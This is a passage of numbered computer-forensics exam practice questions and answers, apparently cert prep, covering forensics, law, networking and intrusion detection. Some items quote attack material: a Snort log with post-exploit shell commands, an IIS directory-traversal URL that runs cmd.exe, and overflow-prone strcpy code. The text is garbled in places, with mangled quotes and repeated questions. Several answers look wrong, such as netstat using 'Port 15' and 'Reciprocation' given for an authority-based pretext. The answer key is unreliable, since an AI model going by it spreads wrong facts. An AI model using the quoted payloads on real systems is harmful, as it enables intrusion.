though the original file has been overwritten by another file?

A

Slack Space

429
Q

A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker .
Given below is an excerpt from a Snort binary capture of the attack. Decipher the
activity carried out by the attacker by studying the log. Please note that you are
required to infer only what is explicit in the excerpt.
(Note: The student is being tested on concepts learnt during passive OS
fingerprinting, basic TCP/IP connection concepts and the ability to read packet
signatures from a sniff dump.)
03/15-20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111
TCP TTL:43 TOS:0x0 ID:29726 IpLen:20 DgmLen:52 DF
A* Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 23678634 2878772
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=
03/15-20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111
UDP TTL:43 TOS:0x0 ID:29733 IpLen:20 DgmLen:84
Len: 64
01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0 …………….
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 …………….
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 …………….
00 00 00 11 00 00 00 00 ……..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=
03/15-20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773
UDP TTL:43 TOS:0x0 ID:29781 IpLen:20 DgmLen:1104
Len: 1084
47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8 G..c…………
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ……………
3A B1 5E E5 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :.^…..localhost
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+
03/15-20:21:36.539731 211.185.125.124:4450 -> 172.16.1.108:39168
TCP TTL:43 TOS:0x0 ID:31660 IpLen:20 DgmLen:71 DF
AP Seq: 0x9C6D2BFF Ack: 0x59606333 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 23679878 2880015
63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20 cd /; uname -a;
69 64 3B id;

A

The attacker has conducted a network sweep on port 111

430
Q

Which federal computer crime law specifically refers to fraud and related activity in
connection with access devices like routers?

A

18 U.S.C. 1029

431
Q

When cataloging digital evidence, the primary goal is to

A

Preserve evidence integrity

432
Q

What encryption technology is used on Blackberry devices?Password Keeper?

A

AES

433
Q

As a CHFI professional, which of the following is the most important to your
professional reputation?

A

The correct, successful management of each and every case

434
Q

Jason has set up a honeypot environment by creating a DMZ that has no physical or logical
access to his production network. In this honeypot, he has placed a server running
Windows Active Directory. He has also placed a Web server in the DMZ that services a
number of web pages that offer visitors a chance to download sensitive information by
clicking on a button. A week later, Jason finds in his network logs how an intruder accessed
the honeypot and downloaded sensitive information. Jason uses the logs to try and
prosecute the intruder for stealing sensitive corporate information. Why will this not be
viable?

A

Entrapment

435
Q

When you are running a vulnerability scan on a network and the IDS cuts off your
connection, what type of IDS is being used?

A

Active IDS

436
Q

When examining a hard disk without a write-blocker, you should not start windows
because Windows will write data to the:

A

Recycle Bin

437
Q

What type of attack occurs when an attacker can force a router to stop forwarding packets
by flooding the router with many open connections simultaneously so that all the hosts
behind the router are effectively disabled?

A

Denial of service

438
Q

An Expert witness gives an opinion if:

A

The Opinion, inferences or conclusions depend on special knowledge, skill or training not within the ordinary experience of lay jurors

439
Q

Sectors in hard disks typically contain how many bytes?

A

512

440
Q

You setup SNMP in multiple offices of your company. Your SNMP software manager is not
receiving data from other offices like it is for your main office. You suspect that firewall
changes are to blame. What ports should you open for SNMP to work through Firewalls
(Select 2)

A

161

162

441
Q

What is the following command trying to accomplish? C:> nmap -sU -p445 192.168.0.0/24

A

Verify that UDP port 445 is open for the 192.168.0.0 network

442
Q

When examining the log files from a Windows IIS Web Server, how often is a new log
file created?

A

a new log file is created everyday
Explanation: Wecannot tell if the question is referring to the httperr.log file (IIS 6.0) or is it referring to the logfiles for the website. If IIS is the case, a new log file is created every day should be the correct answer. Microsoft creates the log files in the following format: exYYMMdd.log format and rotates them daily.

443
Q
Office documents (Word, Excel, PowerPoint) contain a code that allows tracking the
MAC, or unique identifier, of the machine that created the document.
What is that code called?
A

the Globally Unique ID

444
Q

You are working as an investigator for a corporation and you have just received instructions
from your manager to assist in the collection of 15 hard drives that are part of an ongoing
investigation. Your job is to complete the required evidence custody forms to properly
document each piece of evidence as other members of your team collect it. Your manager
instructs you to complete one multi-evidence form for the entire case and a single-evidence
form for each hard drive. How will these forms be stored to help preserve the chain of
custody of the case?

A

The multi-evidence form should be placed in the report file and the single-evidence forms should be kept with each hard drive in an approved secure container

445
Q

What should you do when approached by a reporter about a case that you are working on
or have worked on?

A

Say, o comment?Say, ?o comment

446
Q

What file structure database would you expect to find on floppy disks?

A

FAT12
Explanation: NTFS is not designed for removable media, although used on some removable media that is very large, never for floppy disks. FAT32 has a minimum space requirement which is larger than floppy disks FAT16 would seem like a logical choice, but is not usually used on floppies FAT12 would be on floppy disks, and probably not seen on anything else. Since floppy disk media is small in size (less than 2 MB), a FAT12 file system has lower overhead and is more efficient.

447
Q

Harold wants to set up a firewall on his network but is not sure which one would be the
most appropriate. He knows he needs to allow FTP traffic to one of the servers on his
network, but he wants to only allow FTP-PUT. Which firewall would be most appropriate for
Harold? needs?

A

Application-level proxy firewall

448
Q

Which forensic investigating concept trails the whole incident from how the attack began to
how the victim was affected?

A

End-to-end

449
Q

When setting up a wireless network with multiple access points, why is it important to set
each access point on a different channel?

A

Avoid cross talk

450
Q

It takes _____________ mismanaged case/s to ruin your professional reputation as a
computer forensics examiner?

A

only one

451
Q

The rule of thumb when shutting down a system is to pull the power plug. However,
it has certain drawbacks. Which of the following would that be?

A

Any data not yet flushed to the system will be lost
All running processes will be lost

Explanation: Volitile memory will be lost. Data is not flushed to the system, it is flushed to the disk.

452
Q

One way to identify the presence of hidden partitions on a suspect hard drive is to:One way
to identify the presence of hidden partitions on a suspect? hard drive is to:

A

Add up the total size of all known partitions and compare it to the total size of the hard drive

453
Q

What will the following URL produce in an unpatched IIS Web Server?
http://www.thetargetsite.com/scripts/..%
co%af../..%co%af../windows/system32/cmd.exe?/c+dir+c:\

A

Directory listing of C: drive on the web server

454
Q

In a forensic examination of hard drives for digital evidence, what type of user is
most likely to have the most file slack to analyze?

A

one who has lots of allocation units per block or cluster

455
Q

You are assisting in the investigation of a possible Web Server hack. The company who
called you stated that customers reported to them that whenever they entered the web
address of the company in their browser, what they received was a pornographic web site.
The company checked the web server and nothing appears wrong. When you type in the
IP address of the web site in your browser everything appears normal. What is the name of
the attack that affects the DNS cache of the name resolution servers, resulting in those
servers directing users to the wrong web site?

A

DNS Poisoning

456
Q

Tyler is setting up a wireless network for his business that he runs out of his home. He has
followed all the directions from the ISP as well as the wireless router manual. He does not
have any encryption set and the SSID is being broadcast. On his laptop, he can pick up the
wireless signal for short periods of time, but then the connection drops and the signal goes
away. Eventually the wireless signal shows back up, but drops intermittently. What could
be Tyler issue with his home wireless network?

A

2.4Ghz Cordless phones

457
Q

This type of testimony is presented by someone who does the actual fieldwork and does
not offer a view in court.

A

Expert testimony

458
Q

While working for a prosecutor, What do you think you should do if the evidence you
found appears to be exculpatory and is not being released to the defense ?

A

Bring the information to the attention of the prosecutor, his or her supervisor or finally to the judge

459
Q

Harold is finishing up a report on a case of network intrusion, corporate spying, and
embezzlement that he has been working on for over six months. He is trying to find the
right term to use in his report to describe network-enabled spying. What term should Harold
use?

A

Netspionage

460
Q

You have completed a forensic investigation case. You would like to destroy the
data contained in various disks at the forensics lab due to sensitivity of the case.
How would you permanently erase the data on the hard disk?

A

Throw the hard disk into the fire
Format the hard disk multiple times using a low level disk utility

Explanation: To be effective with throwing the hard drive into the fire, the fire would have to be hot enough to melt the platters into molten metal, which requires an industrial furnance. This requires special facilities. Running powerful magnets over the disk, such as degaussing the disk, may destroy the data, but may also be ineffective. In some cases, the degaussing process for tape and disk may render the disk unusable for use again. (of course throwing the drives into a furnance also guarantee that as well). Formatting the disk multiple times with a low level disk utility is the best way to go, and still beable to re-use the disk for later projects. The keys are multiple and low level. A low level format is typicall a slow, thorough, format that is a wipe. Multiple as opposed to once is recommended. There is a theory on how many times, some schools say at least three times. The problem with this answer is that with newer drives, such as ATA and SCSI, low level formats can destroy the volumes as well, and some BIOS may actually ignore the LLF directives. Overwritting the disk with junk data would perform some form of wipe because the old data is wiped out, but still may be recoverd. Note: According to some websites: Physical Methods that will not work to destroy data on a hard drive include:Throwing it in the water (this does not do much)Setting it on fire (the temperature is not going to be high enough at home)Throwing it out of the window. Hard drives can take quite a bit of G force. They are not heavy so the impact of the hard drive on the ground is not likely to destroy the platters.Drive over the hard drive. A car, or even a tank, driving over a hard drive will do nothing, any more than they would driving over a book. Unless the drive is actually flattened, the platters are not going to be destroyed

461
Q

When investigating a potential e-mail crime, what is your first step in the
investigation?

A

Trace the IP address to its origin

462
Q

Which Intrusion Detection System (IDS) usually produces the most false alarms due
to the unpredictable behaviors of users and networks?

A

host-based IDS systems (HIDS)
anomaly detection

Explanation: NIDS and HIDS are types of IDS systems, Host or Network, and addresses placement of the probe. Anomaly detection is based on behavior analysis, and if you read the question, the question says behavior and if the behavior is unporedictable, then the IDS wont know what is normal and what is bad.

463
Q

When you carve an image, recovering the image depends on which of the following
skills?

A

Recognizing the pattern of the header content

464
Q

Which program is the oot loader?when Windows XP starts up?Which program is the ?oot
loader?when Windows XP starts up?

A

NTLDR

465
Q

Kyle is performing the final testing of an application he developed for the accounting
department. His last round of testing is to ensure that the program is as secure as possible.
Kyle runs the following command. What is he testing at this point? #include #include int
main(int argc, char *argv[]) { char buffer[10]; if (argc < 2) { fprintf (stderr, “USAGE: %s
string\n”, argv[0]); return 1; } strcpy(buffer, argv[1]); return 0; }

A

Buffer overflow

466
Q

What information do you need to recover when searching a victim computer for a crime
committed with specific e-mail message?What information do you need to recover when
searching a victim? computer for a crime committed with specific e-mail message?

A

E-mail header

467
Q

How many bits is Source Port Number in TCP Header packet?

A

16

468
Q

How many characters long is the fixed-length MD5 algorithm checksum of a critical system
file?

A

32

469
Q

After passively scanning the network of Department of Defense (DoD), you switch over to
active scanning to identify live hosts on their network. DoD is a large organization and
should respond to any number of scans. You start an ICMP ping sweep by sending an IP
packet to the broadcast address. Only five hosts responds to your ICMP pings; definitely
not the number of hosts you were expecting. Why did this ping sweep only produce a few
responses?

A

Only Unix and Unix-like systems will reply to this scan

470
Q

To make sure the evidence you recover and analyze with computer forensics
software can be admitted in court, you must test and validate the software. What
group is actively providing tools and creating procedures for testing and validating
computer forensics software ?

A

National Institute of Standards and Technology (NIST)

471
Q

In Linux, what is the smallest possible shellcode?

A

24 bytes

472
Q

Harold is a security analyst who has just run the rdisk /s command to grab the backup SAM
file on a computer. Where should Harold navigate on the computer to find the file?

A

%systemroot%\repair

473
Q

Julia is a senior security analyst for Berber Consulting group. She is currently working on a
contract for a small accounting firm in Florida. They have given her permission to perform
social engineering attacks on the company to see if their in-house training did any good.
Julia calls the main number for the accounting firm and talks to the receptionist. Julia says
that she is an IT technician from the company’s main office in Iowa. She states that she
needs the receptionist’s network username and password to troubleshoot a problem they
are having. Julia says that Bill Hammond, the CEO of the company, reQuested this
information. After hearing the name of the CEO, the receptionist gave Julia all the
information she asked for. What principal of social engineering did Julia use?

A

Reciprocation

474
Q

When an investigator contacts by telephone the domain administrator or controller
listed by a whois lookup to request all e-mails sent and received for a user account
be preserved, what U.S.C. statute authorizes this phone call and obligates the ISP to
preserve e-mail records?

A

Title 18, Section 2703(f)
Explanation: 18 U.S.C. 1029 Fraud and Related Activity in Connection with Access Devices 18 U.S.C. 1030 Fraud and Related Activity in Connection with Computers 18 U.S.C. 2703 Required Disclosure of Customer Communications Records 18 U.S.C. 2703(d) Requirements for Court Order 18 U.S.C. 2703(f) Requirement to Preserve Evidence

475
Q

You are running through a series of tests on your network to check for any security
vulnerabilities. After normal working hours, you initiate a DoS attack against your external
firewall. The firewall Quickly freezes up and becomes unusable. You then initiate an FTP
connection from an external IP into your internal network. The connection is successful
even though you have FTP blocked at the external firewall. What has happened?

A

The firewall failed-open

476
Q

You are using DriveSpy, a forensic tool and want to copy 150 sectors where the
starting sector is 1709 on the primary hard drive. Which of the following formats
correctly specifies these sectors?

A

0:1709, 150
Explanation: DriveSpy can except two different formats: Drive #:Start Sector, # Sectors Drive#:Start Sector-Absolute End Sector. Drive # is zero based Both Answer B and D would appear correct, and both formats are valid.

477
Q

A forensics investigator needs to copy data from a computer to some type of removable
media so he can examine the information at another location. The problem is that the data
is around 42GB in size. What type of removable media could the investigator use?

A

Blu-Ray dual-layer

478
Q

George is the network administrator of a large Internet company on the west coast. Per
corporate policy, none of the employees in the company are allowed to use FTP or SFTP
programs without obtaining approval from the IT department. Few managers are using
SFTP program on their computers. Before talking to his boss, George wants to have some
proof of their activity. George wants to use Ethereal to monitor network traffic, but only
SFTP traffic to and from his network. What filter should George use in Ethereal?

A

src port 22 and dst port 22

479
Q

The objective of this act was to protect consumers personal financial information held by
financial institutions and their service providers.

A

Gramm-Leach-Bliley Act

480
Q

Volatile Memory is one of the leading problems for forensics. Worms such as code
Red are memory resident and do not write themselves to the hard drive, if you turn
the system off they disappear. In a lab environment, which of the following options
would you suggest as the most appropriate to overcome the problem of capturing
volatile memory?

A

Use Vmware to be able to capture the data in memory and examine it
Create a Separate partition of several hundred megabytes and place the swap file there

481
Q

After passing her CEH exam, Carol wants to ensure that her network is completely secure.
She implements a DMZ, statefull firewall, NAT, IPSEC, and a packet filtering firewall. Since
all security measures were taken, none of the hosts on her network can reach the Internet.
Why is that?

A

NAT does not work with IPSEC

482
Q

Which of the following filesystem is used by Mac OS X?

A

HFS+

Explanation: EFS (Encrypting File System) is part of NTFS and used on Windows EXT2 is used on Linux NFS (Network File System) is for access to a network file system over TCP/IP

483
Q

What TCP/UDP port does the toolkit program netstat use?

A

Port 15

484
Q

You work as a penetration tester for Hammond Security Consultants. You are currently
working on a contract for the state government of California. Your next step is to initiate a
DoS attack on their network. Why would you want to initiate a DoS attack on a system you
are testing?

A

List weak points on their network

485
Q

What is the first step taken in an investigation for laboratory forensic staff members?

A

Securing and evaluating the electronic crime scene

486
Q

You are the network administrator for a small bank in Dallas, Texas. To ensure network
security, you enact a security policy that requires all users to have 14 character passwords.
After giving your users 2 weeks notice, you change the Group Policy to force 14 character
passwords. A week later you dump the SAM database from the standalone server and run
a password-cracking tool against it. Over 99% of the passwords are broken within an hour.
Why were these passwords cracked so Quickly?

A

Passwords of 14 characters or less are broken up into two 7-character hashes